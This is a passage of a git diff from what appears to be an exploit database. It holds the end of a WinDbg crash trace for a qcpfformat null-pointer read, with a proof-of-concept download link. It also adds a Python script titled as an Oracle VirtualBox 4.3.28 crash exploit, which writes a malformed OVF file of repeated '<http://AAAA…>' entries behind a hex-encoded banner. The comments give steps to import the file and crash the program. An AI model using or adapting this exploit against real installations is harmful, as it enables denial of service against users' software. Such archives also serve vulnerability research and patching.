+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d3 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei ng nz ac po cy
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
+qcpfformat+0x13d3:
+54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d7 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13d7:
+54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce4d4=00000000
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
+eip=54cd13da esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13da:
+54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
+eip=54cd13dc esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13dc:
+54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=?? 
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40617.zip
\ No newline at end of file
diff --git a/platforms/windows/dos/40618.py b/platforms/windows/dos/40618.py
new file mode 100755
index 000000000..6e6af3675
--- /dev/null
+++ b/platforms/windows/dos/40618.py
@@ -0,0 +1,91 @@
+#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
+#Author: sultan albalawi
+#Tested on:win7
+#open viryualbox -->ctrl+i-->choose file -->double+double+double next
+ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
+ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
+ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
+ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
+ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
+ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
+ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
+ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
+ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a' 
+ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
+ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
+ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
+ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
+ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
+ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
+ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
+ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
+ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
+ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20' 
+ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
+ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
+ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
+ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
+ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
+ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
+ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
+ban+='\n'
+ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
+ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
+print ban
+pof1 = "<"
+pof2 = "http://"
+Crash = "\x41"*19
+pof3=">"
+vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
+Crash_file=("Crach.ovf")
+file = open(Crash_file, 
"w")
+file.write(vm)
+file.close()
+print 'file done'.format(Crash_file)
\ No newline at end of file